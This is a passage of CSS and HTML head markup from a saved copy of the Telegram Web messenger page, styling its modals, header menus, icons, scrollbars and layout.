  1977. .md_modal_split_actions_wrap{position:relative}
  1978. .md_modal_split_action_camera{display:inline-block;width:20px;height:18px;margin:17px 0 0 16px;background-image:/*savepage-url=../img/icons/ProfileIcons.png*/url();background-repeat:no-repeat;background-position:-10px -164px}
  1979. .is_2x .md_modal_split_action_camera{background-image:/*savepage-url=../img/icons/ProfileIcons_2x.png*/url();background-size:40px 420px}
  1980. .md_modal_split_action:active .md_modal_split_action_camera,.md_modal_split_action:hover .md_modal_split_action_camera{background-position:-10px -192px}
  1981. .md_modal_split_action_twitter{display:inline-block;width:27px;height:22px;margin:17px 0 0 13px;background-image:/*savepage-url=../img/icons/ProfileIcons.png*/url();background-repeat:no-repeat;background-position:-7px -280px}
  1982. .is_2x .md_modal_split_action_twitter{background-image:/*savepage-url=../img/icons/ProfileIcons_2x.png*/url();background-size:40px 420px}
  1983. .md_modal_split_action:active .md_modal_split_action_twitter,.md_modal_split_action:hover .md_modal_split_action_twitter{background-position:-7px -312px}
  1984. .md_modal_split_action_msg{display:inline-block;width:20px;height:20px;margin:18px 0 0 16px;background-image:/*savepage-url=../img/icons/ProfileIcons.png*/url();background-repeat:no-repeat;background-position:-10px -220px}
  1985. .is_2x .md_modal_split_action_msg{background-image:/*savepage-url=../img/icons/ProfileIcons_2x.png*/url();background-size:40px 420px}
  1986. .md_modal_split_action:active .md_modal_split_action_msg,.md_modal_split_action:hover .md_modal_split_action_msg{background-position:-10px -250px}
  1987. .md_modal_iconed_section_wrap{position:relative;border-bottom:1px solid #ebebeb;margin:19px 0 0 120px;padding-right:28px}
  1988. .md_modal_iconed_section_wrap:last-child{border-bottom:0}
  1989. .md_modal_iconed_section_number{margin-top:0}
  1990. .md_modal_iconed_section_toggle{margin-top:10px}
  1991. .md_modal_iconed_section_radio{margin-top:1px}
  1992. .md_modal_sections{padding-top:17px}
  1993. .md_modal_section_icon{display:inline-block;margin-left:-64px;margin-top:5px;position:absolute;background-image:/*savepage-url=../img/icons/ProfileIcons.png*/url();background-repeat:no-repeat;background-position:0 0}
  1994. .is_2x .md_modal_section_icon{background-image:/*savepage-url=../img/icons/ProfileIcons_2x.png*/url();background-size:40px 420px}
  1995. .md_modal_iconed_section_toggle .md_modal_section_icon{margin-top:8px}
  1996. .md_modal_iconed_section_radio .md_modal_section_icon{margin-top:10px}
  1997. .md_modal_iconed_section_link .md_modal_section_icon{margin-top:4px}
  1998. .md_modal_section_icon_phone{width:18px;height:18px;background-position:-12px -10px;margin-top:3px}
  1999. .md_modal_section_icon_about{width:20px;height:20px;background-position:-10px -344px;margin-top:0}
  2000. .md_modal_section_icon_notification{width:17px;height:20px;background-position:-12px -38px}
  2001. .md_modal_section_icon_keyboard{width:20px;height:14px;background-position:-10px -140px;margin-left:-66px}
  2002. .md_modal_section_icon_person{width:16px;height:16px;background-position:-12px -90px}
  2003. .md_modal_section_icon_people{width:22px;height:14px;background-position:-9px -116px}
  2004. .md_modal_section_icon_more{width:18px;height:12px;background-position:-11px -68px}
  2005. .md_modal_section_param_wrap{margin-top:19px;margin-bottom:19px}
  2006. .md_modal_section_param_wrap:last-child{margin-bottom:16px}
  2007. .md_modal_section_param_wrap .md_modal_section_param_name{color:#909090;font-size:11px;line-height:14px;margin-top:4px}
  2008. .md_modal_section_param_wrap .md_modal_section_param_value{word-break:break-word;word-wrap:break-word;overflow:hidden}
  2009. .md_modal_section_range_wrap{padding-right:4px;margin-bottom:25px;padding-top:1px}
  2010. .md_modal_section_select_wrap{margin-bottom:20px}
  2011. .md_modal_section_select{float:right;font-size:12px;padding:0}
  2012. .md_modal_section_select_wrap .md_modal_section_param_name{padding-top:1px}
  2013. .md_modal_section_select .dropdown-toggle{font-size:12px;padding:0;line-height:normal}
  2014. .md_modal_section_select .dropdown-menu{left:-15px}
  2015. .md_modal_section_link{color:inherit;display:block;padding:4px 0}
  2016. .md_modal_section_link_wrap{padding-bottom:15px}
  2017. .md_modal_section_link:hover{text-decoration:none}
  2018. .md_modal_section_link.pull-right{color:#3a6d99}
  2019. .md_modal_section_text{display:block;padding:4px 0;color:#777}
  2020. .md_modal_section_version{color:#777;display:inline-block;margin-left:-70px;position:absolute}
  2021. .md_modal_section_splitter{border-top:1px solid #dfdfdf;min-height:12px;background:#f5f5f5;-webkit-box-shadow:inset 0 1px 1px #ededed;-moz-box-shadow:inset 0 1px 1px #ededed;box-shadow:inset 0 1px 1px #ededed}
  2022. .md_modal_section_splitter_content{height:auto;color:#777;font-size:12px;padding:5px 20px 3px 55px}
  2023. .md_modal_versioned_section_wrap{position:relative;border-bottom:1px solid #ebebeb;margin:19px 0 0 120px;padding-right:28px}
  2024. .md_modal_versioned_section_wrap:last-child{border-bottom:0}
  2025. .md_modal_list_peer_wrap{padding-bottom:16px}
  2026. .md_modal_list_peer_action{font-size:13px;padding:3px;margin:-3px}
  2027. .md_modal_list_peer_photo{width:42px;height:42px;line-height:42px;border-radius:50%;overflow:hidden}
  2028. a.md_modal_list_peer_photo,div.md_modal_list_peer_photo{margin-right:12px}
  2029. .md_modal_list_peer_name{font-size:13px;font-weight:700}
  2030. a.md_modal_list_peer_name{color:inherit}
  2031. .md_modal_list_peer_description{margin-top:4px;color:#999}
  2032. .md_modal_list_peer_description .status_online,.md_modal_list_peer_description.status_online{color:#3a6d99}
  2033. .md_modal_footer{padding:15px 27px}
  2034. .md_modal_footer_empty{padding:10px 27px 0}
  2035. .md_photo_loading{display:block;width:72px;height:72px;border-radius:36px;overflow:hidden;background:#48769b;text-align:center;line-height:72px;padding:0}
  2036. .md_photo_loading i{display:inline-block;background:#fff;width:8px;height:8px;border-radius:4px;vertical-align:middle;border:0;margin-left:6px}
  2037. .md_photo_loading i:first-child{margin-left:0}
  2038. .inactive_page_content{max-width:400px;margin:0 auto;text-align:center}
  2039. .inactive_image{display:block;background-image:/*savepage-url=../img/Manytabs.png*/url();background-repeat:no-repeat;width:341px;height:262px;margin:0 auto}
  2040. .is_2x .inactive_image{background-image:/*savepage-url=../img/Manytabs_2x.png*/url();background-size:341px 262px}
  2041. .inactive_title{font-size:18px;color:#444}
  2042. .inactive_description{color:#666;font-size:15px;line-height:150%}
  2043. .inactive_actions{margin-top:15px}
  2044. @media print{body,html{background:#fff}
  2045. body .im_page_wrap{border:0;box-shadow:none;overflow:visible}
  2046. body .im_bottom_panel_wrap,body .im_dialogs_col_wrap,body .tg_head_logo_wrap,body .tg_head_peer_dropdown,body .tg_head_peer_return_btn,body .tg_head_peer_search_btn{display:none}
  2047. body .im_history_wrap{height:auto!important}
  2048. body .nano-pane{display:none}
  2049. body .nano>.nano-content{position:static}
  2050. body .tg_head_peer_info{text-align:center}
  2051. body .im_history_col_wrap,body .tg_head_main_wrap{width:auto;max-width:700px;float:none;margin:0 auto}}
  2052. .visually-hidden{position:absolute!important;height:1px;width:1px;overflow:hidden;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px)}</style><link rel="manifest" href="manifest.webapp.json"><link rel="shortcut icon" type="image/x-icon" data-savepage-href="favicon.ico" href="data:image/x-icon;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABGdBTUEAAK/INwWK6QAAAAZiS0dEAAAAAAAA+UO7fwAAAAlwSFlzAAAASAAAAEgARslrPgAAAAl2cEFnAAAAIAAAACAAh/qcnQAAAwxJREFUWMO9l19IU1Ecxz+7XmVukjJmKSWpKIQUBPlSCEZmSCWG7/XSk0+FUARBD0KWREL00FMURfjgU6RDNBJDimBCIUiI5lw6w9Fqzjbd3NbDva7turt7rn/6wuXec8/v/P7/zvkdy9FXHkygWX1OAMVADRAH5oAAMAEMAWOiDC0CCjiAO8Bl9VsEfuAl0AUEcxFKOeYKgFvAN+CaCeEApUAnMK++88wq4ACGgXsort4uioGHwICeAdkUqAPcQOMOBGvRAnwCqowUKAVeZyPcBdSgeDXDo+kKFAD9KuFeoUaVkcqJdAU62V2366EZJakzFHCgZPz/wm3UUEjaHzuF05rHlSP7eNp0gPr9Vj0yB3ADQAYKgas7EWqTLZw+ZKO1yk5DeWHq/9vvYdzLa3rLOoAuGTizXesbygs5X2mnqcKGTbZkzMUSSVyeP7mWO4BmGaVGhVFbkk9rVRGtVXacVt0NjnHfGsFowtAGGThmROW05tFWXcSFSju1JflCig54VkXIjsvobDqSBVoO27lUXcTJMqsIsxSC0QRjixER0hoZnfifrbDRc8ppSvAmRrxh1uNJEdJi3dNwdCFC33SIhBCfTAzmTr4MSOic17FEkm53gHaXj/ElIXcCsLi6kav0tAhKKN2MLmaDMTpGl+kYXWY2GDO2fl7cemBGAiZFKMeXIrS7fHS7A8RyxOXNnCkFPksoPZwQEknomw7x4utK1vnJn+t4Voy9lG6XBLzDoG/T4tnUStZNxmUi+VCa2BEJiADPzawMRhM8/vJ7i3cGPWEzbJ4A0c0yNOxeteifCeENbaTG40sRfq3HzVjfC/+O4wBw34wCiST0TARSY5PJd1eVmdER9WLiQgHw3hdh2BvGG9pgdEHY/SPAo82B9mJSCnxg7/rCGaCetHBrt2I/0IbB5rQD4efQ5Fq2s2BK1dJUOAwwpPLcYpjeYRQAmoCbmKyOLHyuAxf1+OS6G8aBB0A1SoL6TQj+gVJV1SgJp1ufIrfjdDSitHB1wEGgTGXuB7wo4RsEPooy/At+fulqEOTKiwAAACJ6VFh0U29mdHdhcmUAAHjac0zJT0pV8MxNTE8NSk1MqQQAL5wF1K4MqU0AAAAASUVORK5CYII="><link rel="apple-touch-icon" href="img/iphone_home120.png"><link rel="apple-touch-icon" sizes="120x120" href="img/iphone_home120.png"><link rel="apple-touch-startup-image" media="(device-width: 320px)" href="img/iphone_startup.png"><meta name="apple-mobile-web-app-title" content="Telegram Web"><meta name="mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><meta name="theme-color" content="#497495"><meta name="google" content="notranslate"><meta property="og:title" content="Telegram Web"><meta property="og:url" content="https://web.telegram.org/"><meta property="og:image" content="https://web.telegram.org/img/logo_share.png"><meta property="og:site_name" content="Telegram Web"><meta property="description" content="Welcome to the Web application of Telegram messenger. See https://github.com/zhukov/webogram for more info."><meta property="og:description" content="Welcome to the Web application of Telegram messenger. See https://github.com/zhukov/webogram for more info."><style data-savepage-href="css/desktop.css">/* Thanks to @brandonb927
  2053. https://gist.github.com/brandonb927/3874012
  2054. Prepending 'only screen and ' to each media query breaks nested media queries */
  2055. /* app desktop css */
  2056. .tg_head_split {
  2057. max-width: 1010px;
  2058. margin: 0 auto;
  2059. height: 48px;
  2060. background: #5682a3;
  2061. }
  2062. .tg_head_logo_wrap {
  2063. float: left;
  2064. width: 31%;
  2065. }
  2066. .tg_head_main_wrap {
  2067. float: left;
  2068. width: 69%;
  2069. white-space: nowrap;
  2070. }
  2071. .tg_head_btn {
  2072. display: block;
  2073. font-weight: bold;
  2074. padding: 16px 19px;
  2075. color: #b9cfe3;
  2076. font-size: 13px;
  2077. line-height: 16px;
  2078. }
  2079. .dropdown.open .tg_head_btn,
  2080. .tg_head_btn:hover {
  2081. color: #fff;
  2082. text-decoration: none;
  2083. background: #497799;
  2084. }
  2085. .dropdown.open .tg_head_btn {
  2086. position: relative;
  2087. z-index: 5;
  2088. }
  2089. .tg_head_logo_dropdown .dropdown-toggle {
  2090. color: #fff;
  2091. padding: 17px 20px 15px 22px;
  2092. display: block;
  2093. font-size: 14px;
  2094. line-height: 16px;
  2095. vertical-align: top;
  2096. }
  2097. .tg_head_logo_dropdown .dropdown-toggle:hover,
  2098. .tg_head_logo_dropdown .dropdown-toggle:focus,
  2099. .tg_head_logo_dropdown .dropdown-toggle:active {
  2100. text-decoration: none;
  2101. }
  2102. .tg_head_logo_dropdown .dropdown-toggle .tg_head_logo_text {
  2103. display: inline-block;
  2104. vertical-align: top;
  2105. }
  2106. .icon-hamburger-wrap {
  2107. display: inline-block;
  2108. width: 18px;
  2109. height: 14px;
  2110. -webkit-transform: translate3d(0, 0, 0);
  2111. }
  2112. .tg_head_logo_dropdown .icon-hamburger-wrap {
  2113. margin: 0 40px 0 0;
  2114. vertical-align: top;
  2115. }
  2116. .tg_head_logo_dropdown .icon-tg-title {
  2117. vertical-align: top;
  2118. }
  2119. .icon-hamburger-wrap .icon-bar {
  2120. background: #fff;
  2121. display: block;
  2122. height: 2px;
  2123. margin: 0;
  2124. }
  2125. .icon-hamburger-wrap .icon-bar:nth-child(2) {
  2126. margin-bottom: 4px;
  2127. margin-top: 4px;
  2128. }
  2129. .tg_head_logo_dropdown .icon-bar {
  2130. opacity: 1;
  2131. -webkit-transition: -webkit-transform 0.1s ease-in;
  2132. -o-transition: -o-transform 0.1s ease;
  2133. -ms-transition: -ms-transform 0.1s ease;
  2134. -moz-transition: -moz-transform 0.1s ease;
  2135. transition: transform 0.1s ease-in;
  2136. -webkit-transform-origin: 50% 50%;
  2137. -o-transform-origin: 50% 50%;
  2138. -ms-transform-origin: 50% 50%;
  2139. -moz-transform-origin: 50% 50%;
  2140. transform-origin: 50% 50%;
  2141. }
  2142. .tg_head_logo_dropdown:not(.open) .dropdown-toggle:hover .icon-bar:nth-child(1) {
  2143. -webkit-transform: translateY(-1px);
  2144. -moz-transform: translateY(-1px);
  2145. -o-transform: translateY(-1px);
  2146. -ms-transform: translateY(-1px);
  2147. transform: translateY(-1px);
  2148. }
  2149. .tg_head_logo_dropdown:not(.open) .dropdown-toggle:hover .icon-bar:nth-child(3) {
  2150. -webkit-transform: translateY(1px);
  2151. -moz-transform: translateY(1px);
  2152. -o-transform: translateY(1px);
  2153. -ms-transform: translateY(1px);
  2154. transform: translateY(1px);
  2155. }
  2156. .tg_head_logo_dropdown.open .icon-bar:nth-child(1) {
  2157. -webkit-transform: translate3d(0, 6px, 0) rotate(45deg);
  2158. -moz-transform: translate3d(0, 6px, 0) rotate(45deg);
  2159. -o-transform: translate3d(0, 6px, 0) rotate(45deg);
  2160. -ms-transform: translate3d(0, 6px, 0) rotate(45deg);
  2161. transform: translate3d(0, 6px, 0) rotate(45deg);
  2162. }
  2163. .tg_head_logo_dropdown.open .icon-bar:nth-child(2) {
  2164. opacity: 0;
  2165. }
  2166. .tg_head_logo_dropdown.open .icon-bar:nth-child(3) {
  2167. -webkit-transform: translate3d(0, -6px, 0) rotate(-45deg);
  2168. -moz-transform: translate3d(0, -6px, 0) rotate(-45deg);
  2169. -o-transform: translate3d(0, -6px, 0) rotate(-45deg);
  2170. -ms-transform: translate3d(0, -6px, 0) rotate(-45deg);
  2171. transform: translate3d(0, -6px, 0) rotate(-45deg);
  2172. }
  2173. .tg_head_logo_dropdown .dropdown-menu {
  2174. border-radius: 0;
  2175. padding: 9px 0 7px;
  2176. margin: -1px 0 0;
  2177. float: none;
  2178. right: 0;
  2179. border: 1px solid rgba(15, 60, 96, 0.2);
  2180. border-left-color: #b5c3d0;
  2181. border-right-color: #b5c3d0;
  2182. -webkit-box-shadow: 0px 1px 3px 0px rgba(60, 75, 87, 0.27);
  2183. -moz-box-shadow: 0px 1px 3px 0px rgba(60, 75, 87, 0.27);
  2184. box-shadow: 0px 1px 3px 0px rgba(60, 75, 87, 0.27);
  2185. overflow: hidden;
  2186. }
  2187. @-webkit-keyframes rollIn {
  2188. from {
  2189. transform: translateY(-220px);
  2190. }
  2191. to {
  2192. transform: translateY(0);
  2193. }
  2194. }
  2195. @keyframes rollIn {
  2196. from {
  2197. transform: translateY(-220px);
  2198. }
  2199. to {
  2200. transform: translateY(0);
  2201. }
  2202. }
  2203. .tg_head_logo_dropdown.open .dropdown-menu {
  2204. -webkit-animation: rollIn 0.1s ease-in;
  2205. animation: rollIn 0.1s ease-in;
  2206. z-index: 4;
  2207. }
  2208. .tg_head_logo_dropdown .dropdown-menu > li > a {
  2209. font-size: 12px;
  2210. line-height: 21px;
  2211. padding: 11px 19px 10px 21px;
  2212. color: #42749b;
  2213. }
  2214. .tg_head_logo_dropdown .dropdown-menu > li > a:hover {
  2215. background: #f2f6fa;
  2216. }
  2217. .tg_head_logo_dropdown .dropdown-menu > li > a span {
  2218. vertical-align: top;
  2219. }
  2220. .icon-new-group {
  2221. width: 20px;
  2222. height: 14px;
  2223. margin-right: 38px;
  2224. display: inline-block;
  2225. vertical-align: top;
  2226. margin-top: 3px;
  2227. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  2228. background-repeat: no-repeat;
  2229. background-position: -10px -111px;
  2230. }
  2231. .is_2x .icon-new-group {
  2232. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  2233. background-size: 40px 948px;
  2234. }
  2235. .icon-contacts {
  2236. width: 18px;
  2237. height: 18px;
  2238. margin-right: 40px;
  2239. margin-top: 2px;
  2240. display: inline-block;
  2241. vertical-align: top;
  2242. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  2243. background-repeat: no-repeat;
  2244. background-position: -11px -135px;
  2245. }
  2246. .is_2x .icon-contacts {
  2247. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  2248. background-size: 40px 948px;
  2249. }
  2250. .icon-settings {
  2251. width: 20px;
  2252. height: 20px;
  2253. margin-right: 38px;
  2254. margin-top: 1px;
  2255. display: inline-block;
  2256. vertical-align: top;
  2257. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  2258. background-repeat: no-repeat;
  2259. background-position: -10px -163px;
  2260. }
  2261. .is_2x .icon-settings {
  2262. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  2263. background-size: 40px 948px;
  2264. }
  2265. .icon-faq {
  2266. width: 20px;
  2267. height: 20px;
  2268. margin-right: 38px;
  2269. margin-top: 1px;
  2270. display: inline-block;
  2271. vertical-align: top;
  2272. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  2273. background-repeat: no-repeat;
  2274. background-position: -10px -637px;
  2275. }
  2276. .is_2x .icon-faq {
  2277. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  2278. background-size: 40px 948px;
  2279. }
  2280. .icon-about {
  2281. width: 21px;
  2282. height: 21px;
  2283. margin-right: 37px;
  2284. display: inline-block;
  2285. vertical-align: top;
  2286. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  2287. background-repeat: no-repeat;
  2288. background-position: -10px -193px;
  2289. }
  2290. .is_2x .icon-about {
  2291. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  2292. background-size: 40px 948px;
  2293. }
  2294. .tg_head_connecting_text {
  2295. color: #b9cfe3;
  2296. padding: 14px 15px;
  2297. font-size: 13px;
  2298. display: block;
  2299. line-height: 20px;
  2300. float: left;
  2301. }
  2302. .tg_head_connecting_wrap .tg_head_btn {
  2303. float: left;
  2304. }
  2305. .tg_head_peer_search_btn {
  2306. float: right;
  2307. padding-top: 15px;
  2308. padding-bottom: 15px;
  2309. }
  2310. .tg_head_peer_dropdown {
  2311. float: right;
  2312. }
  2313. .tg_head_peer_status {
  2314. font-weight: normal;
  2315. }
  2316. .tg_head_peer_dropdown .dropdown-menu {
  2317. max-width: 100%;
  2318. border-radius: 0;
  2319. padding: 9px 0;
  2320. float: none;
  2321. right: 0;
  2322. left: auto;
  2323. margin: -1px 0 0 0;
  2324. border: 1px solid rgba(15, 60, 96, 0.2);
  2325. -webkit-box-shadow: 0px 1px 3px 0px rgba(60, 75, 87, 0.27);
  2326. -moz-box-shadow: 0px 1px 3px 0px rgba(60, 75, 87, 0.27);
  2327. box-shadow: 0px 1px 3px 0px rgba(60, 75, 87, 0.27);
  2328. }
  2329. .tg_head_peer_more_dropdown .dropdown-menu {
  2330. left: auto;
  2331. right: 0;
  2332. }
  2333. .tg_head_peer_dropdown .dropdown-menu > li > a {
  2334. font-size: 13px;
  2335. line-height: 15px;
  2336. padding: 11px 18px 11px 18px;
  2337. color: #52719a;
  2338. }
  2339. .tg_head_peer_dropdown .dropdown-menu > li > a:hover {
  2340. background: #f3f6fa;
  2341. }
  2342. .tg_head_peer_return_btn {
  2343. float: right;
  2344. }
  2345. .tg_head_peer_return_count {
  2346. color: #fff;
  2347. margin-left: 3px;
  2348. }
  2349. .tg_head_peer_title_wrap {
  2350. overflow: hidden;
  2351. }
  2352. .tg_head_peer_title_wrap .tg_head_btn {
  2353. padding: 15px 19px 15px;
  2354. line-height: 18px;
  2355. }
  2356. .tg_head_peer_title_wrap .tg_head_btn .tg_head_peer_info {
  2357. display: block;
  2358. white-space: nowrap;
  2359. overflow: hidden;
  2360. -ms-text-overflow: ellipsis;
  2361. text-overflow: ellipsis;
  2362. }
  2363. .tg_head_peer_title {
  2364. display: inline-block;
  2365. color: #fff;
  2366. margin-right: 3px;
  2367. -ms-text-overflow: ellipsis;
  2368. text-overflow: ellipsis;
  2369. max-width: 180px;
  2370. overflow: hidden;
  2371. vertical-align: top;
  2372. }
  2373. .tg_head_peer_media {
  2374. padding: 14px 19px;
  2375. color: #fff;
  2376. font-size: 13px;
  2377. line-height: 20px;
  2378. float: left;
  2379. font-weight: bold;
  2380. }
  2381. .icon-search {
  2382. display: inline-block;
  2383. width: 17px;
  2384. height: 17px;
  2385. background-image: /*savepage-url=../img/icons/IconsetW.png*/ url();
  2386. background-repeat: no-repeat;
  2387. background-position: -12px -1037px;
  2388. vertical-align: middle;
  2389. opacity: 0.9;
  2390. }
  2391. .is_2x .icon-search {
  2392. background-image: /*savepage-url=../img/icons/IconsetW_2x.png*/ url();
  2393. background-size: 42px 1171px;
  2394. }
  2395. .tg_head_peer_media_dropdown .dropdown-toggle {
  2396. display: block;
  2397. }
  2398. .tg_head_peer_media_dropdown .dropdown-toggle .icon-bar {
  2399. display: block;
  2400. background-color: #d7e5f0;
  2401. width: 4px;
  2402. height: 4px;
  2403. border-radius: 2px;
  2404. margin-left: 3px;
  2405. margin-right: 3px;
  2406. }
  2407. .tg_head_peer_media_dropdown .dropdown-toggle .icon-bar + .icon-bar {
  2408. margin-top: 2px;
  2409. }
  2410. .icon-filter-photos,
  2411. .icon-filter-video,
  2412. .icon-filter-documents,
  2413. .icon-filter-audio {
  2414. display: inline-block;
  2415. margin-right: 12px;
  2416. vertical-align: top;
  2417. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  2418. background-repeat: no-repeat;
  2419. background-position: 0 0;
  2420. }
  2421. .is_2x .icon-filter-photos,
  2422. .is_2x .icon-filter-video,
  2423. .is_2x .icon-filter-documents,
  2424. .is_2x .icon-filter-audio {
  2425. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  2426. background-size: 40px 948px;
  2427. }
  2428. .icon-filter-photos {
  2429. width: 18px;
  2430. height: 18px;
  2431. background-position: -11px -223px;
  2432. margin-top: 1px;
  2433. }
  2434. .icon-filter-video {
  2435. width: 16px;
  2436. height: 18px;
  2437. background-position: -12px -278px;
  2438. margin-top: 1px;
  2439. }
  2440. .icon-filter-documents {
  2441. width: 18px;
  2442. height: 17px;
  2443. background-position: -11px -251px;
  2444. margin-top: 1px;
  2445. }
  2446. .icon-filter-audio {
  2447. width: 14px;
  2448. height: 19px;
  2449. background-position: -13px -306px;
  2450. margin-top: 0;
  2451. }
  2452. /** initial setup **/
  2453. .nano {
  2454. position: relative;
  2455. width: 100%;
  2456. height: 100%;
  2457. overflow: hidden;
  2458. }
  2459. .nano > .nano-content {
  2460. position: absolute;
  2461. overflow: scroll;
  2462. overflow-x: hidden;
  2463. top: 0;
  2464. right: 0;
  2465. bottom: 0;
  2466. left: 0;
  2467. }
  2468. .nano > .nano-content:focus {
  2469. outline: thin dotted;
  2470. }
  2471. .nano > .nano-content::-webkit-scrollbar {
  2472. display: none;
  2473. }
  2474. .has-scrollbar > .nano-content::-webkit-scrollbar {
  2475. display: block;
  2476. }
  2477. .nano > .nano-pane {
  2478. background: rgba(0, 0, 0, 0.25);
  2479. position: absolute;
  2480. width: 10px;
  2481. right: 0;
  2482. top: 0;
  2483. bottom: 0;
  2484. visibility: hidden\9;
  2485. /* Target only IE7 and IE8 with this hack */
  2486. opacity: 0.01;
  2487. -webkit-transition: 0.2s;
  2488. -moz-transition: 0.2s;
  2489. -o-transition: 0.2s;
  2490. transition: 0.2s;
  2491. -webkit-border-radius: 5px;
  2492. -moz-border-radius: 5px;
  2493. border-radius: 5px;
  2494. }
  2495. .nano > .nano-pane > .nano-slider {
  2496. background: #444;
  2497. background: rgba(0, 0, 0, 0.5);
  2498. position: relative;
  2499. margin: 0 1px;
  2500. -webkit-border-radius: 3px;
  2501. -moz-border-radius: 3px;
  2502. border-radius: 3px;
  2503. }
  2504. .nano:hover > .nano-pane,
  2505. .nano-pane.active,
  2506. .nano-pane.flashed {
  2507. visibility: visible\9;
  2508. /* Target only IE7 and IE8 with this hack */
  2509. opacity: 0.99;
  2510. }
  2511. .composer_emoji_tooltip,
  2512. .composer_dropdown_wrap {
  2513. z-index: 1001;
  2514. }
  2515. .composer_emoji_tooltip .nano > .nano-pane,
  2516. .composer_dropdown_wrap .nano > .nano-pane {
  2517. background: rgba(255, 255, 255, 0);
  2518. right: -2px;
  2519. top: 5px;
  2520. bottom: 5px;
  2521. }
  2522. .composer_emoji_tooltip .nano > .nano-pane > .nano-slider,
  2523. .composer_dropdown_wrap .nano > .nano-pane > .nano-slider {
  2524. background: #d1d1d1;
  2525. background: rgba(0, 0, 0, 0.17);
  2526. margin: 0 3px 0 4px;
  2527. }
  2528. @media (max-width: 940px) {
  2529. .composer_emoji_tooltip {
  2530. margin-left: -245px;
  2531. }
  2532. .composer_emoji_tooltip_tail {
  2533. left: 90%;
  2534. }
  2535. }
  2536. .composer_dropdown_wrap .nano > .nano-pane {
  2537. top: 3px;
  2538. bottom: 3px;
  2539. right: -1px;
  2540. }
  2541. .countries_modal_col .nano > .nano-pane {
  2542. background: rgba(3, 36, 64, 0.08);
  2543. width: 3px;
  2544. right: 6px;
  2545. top: 0;
  2546. -webkit-transition: 0.2s;
  2547. -moz-transition: 0.2s;
  2548. -o-transition: 0.2s;
  2549. transition: 0.2s;
  2550. -webkit-border-radius: 0;
  2551. -moz-border-radius: 0;
  2552. border-radius: 0;
  2553. }
  2554. .countries_modal_col .nano > .nano-pane > .nano-slider {
  2555. background: rgba(3, 46, 79, 0.22);
  2556. margin: 0;
  2557. -webkit-border-radius: 0;
  2558. -moz-border-radius: 0;
  2559. border-radius: 0;
  2560. }
  2561. .im_page_wrap {
  2562. background: #fff;
  2563. max-width: 1010px;
  2564. min-width: 300px;
  2565. margin: 0 auto;
  2566. -webkit-box-shadow: 0px 1px 0 #dfe5ec;
  2567. -moz-box-shadow: 0px 1px 0 #dfe5ec;
  2568. box-shadow: 0px 1px 0 #dfe5ec;
  2569. border-radius: 0 0 3px 3px;
  2570. border-left: 1px solid #dfe5ec;
  2571. border-right: 1px solid #dfe5ec;
  2572. border-bottom: 1px solid #d2dbe3;
  2573. overflow: hidden;
  2574. }
  2575. .footer_wrap {
  2576. font-size: 11px;
  2577. text-align: center;
  2578. color: #9cacb9;
  2579. line-height: 40px;
  2580. }
  2581. .footer_empty {
  2582. height: 23px;
  2583. }
  2584. .footer_brand {
  2585. color: #9cacb9;
  2586. font-weight: bold;
  2587. }
  2588. a.footer_lang_link {
  2589. color: #9cacb9;
  2590. }
  2591. a.footer_lang_link.active {
  2592. font-weight: bold;
  2593. }
  2594. a.footer_link {
  2595. color: #9cacb9;
  2596. padding: 0 3px;
  2597. }
  2598. .footer_brand:hover,
  2599. .footer_brand:active,
  2600. a.footer_lang_link.active:hover,
  2601. a.footer_lang_link.active:active,
  2602. a.footer_link.active:hover,
  2603. a.footer_link.active:active {
  2604. color: #8499aa;
  2605. text-decoration: none;
  2606. }
  2607. .footer_link_divider {
  2608. padding: 0 5px;
  2609. }
  2610. .im_dialogs_col {
  2611. margin-right: -7px;
  2612. }
  2613. .im_dialogs_col_wrap {
  2614. float: left;
  2615. width: 31%;
  2616. border-right: 2px solid #E9EBED;
  2617. padding-bottom: 10px;
  2618. }
  2619. .im_dialogs_scrollable_wrap {
  2620. padding: 0 7px 0 0;
  2621. /* Hardware acceleration in Safari */
  2622. -webkit-transform: translateZ(0);
  2623. -webkit-perspective: 1000;
  2624. -webkit-backface-visibility: hidden;
  2625. }
  2626. .im_dialogs_col .nano > .nano-pane {
  2627. background: rgba(0, 0, 0, 0);
  2628. width: 12px;
  2629. right: 0px;
  2630. -webkit-border-radius: 0;
  2631. -moz-border-radius: 0;
  2632. border-radius: 0;
  2633. -webkit-transition: none;
  2634. -moz-transition: none;
  2635. -o-transition: none;
  2636. transition: none;
  2637. }
  2638. .im_dialogs_col .nano > .nano-pane > .nano-slider {
  2639. background: rgba(30, 85, 127, 0.3);
  2640. margin: 0 5px;
  2641. -webkit-border-radius: 0;
  2642. -moz-border-radius: 0;
  2643. border-radius: 0;
  2644. }
  2645. .im_history_col_wrap {
  2646. float: left;
  2647. width: 69%;
  2648. }
  2649. .im_history_scrollable_wrap {
  2650. /* Hardware acceleration in Safari */
  2651. }
  2652. .im_history_col .nano > .nano-pane,
  2653. .contacts_modal_col .nano > .nano-pane,
  2654. .sessions_modal_col .nano > .nano-pane,
  2655. .stickerset_modal_col .nano > .nano-pane,
  2656. .im_dialogs_modal_col .nano > .nano-pane {
  2657. background: rgba(216, 223, 225, 0.45);
  2658. /*45% d8dfe5*/
  2659. width: 9px;
  2660. right: 0;
  2661. top: 0;
  2662. -webkit-border-radius: 2px;
  2663. -moz-border-radius: 2px;
  2664. border-radius: 2px;
  2665. -webkit-transition: none;
  2666. -moz-transition: none;
  2667. -o-transition: none;
  2668. transition: none;
  2669. }
  2670. .contacts_modal_col .nano > .nano-pane {
  2671. width: 5px;
  2672. right: 4px;
  2673. top: 10px;
  2674. }
  2675. .sessions_modal_col .nano > .nano-pane,
